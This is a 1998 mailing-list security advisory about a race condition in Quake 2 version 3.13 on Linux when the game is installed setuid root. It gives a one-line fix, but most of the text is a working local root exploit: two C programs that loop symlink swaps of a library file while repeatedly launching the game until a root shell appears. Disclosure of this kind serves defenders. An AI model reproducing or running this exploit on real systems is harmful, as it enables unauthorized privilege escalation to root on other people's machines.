Date: Wed, 25 Feb 1998 08:49:10 -0500 From: kevingeo@CRUZIO.COM Subject: Quake 2 Linux 3.13 - ref_root.so still works Vulnerable: Everyone who followed the installation instructions and made Quake2 setuid root. Solution: chmod u-s quake2. Exploit: In version 3.13, Quake2 trys to protect itself by checking the permissions of a library before loading it. This just introduces a race condition. Simply find a file that is owned by root and has 0700 permissions, call ref_root.so ref_root.real.so, run e.c (./e /usr/games/quake2/ref_soft.so &, for example) in background, and then run f.c. You'll have a root shell after a few minutes. e.c: #include void main(int argc, char **argv) { while(1) { unlink("ref_root.so"); symlink(argv[1],"ref_root.so"); unlink("ref_root.so"); symlink("ref_root.real.so","ref_root.so"); } } f.c: #include void main() { while (1) { system("/usr/games/quake/quake2 +set vid_ref root"); } }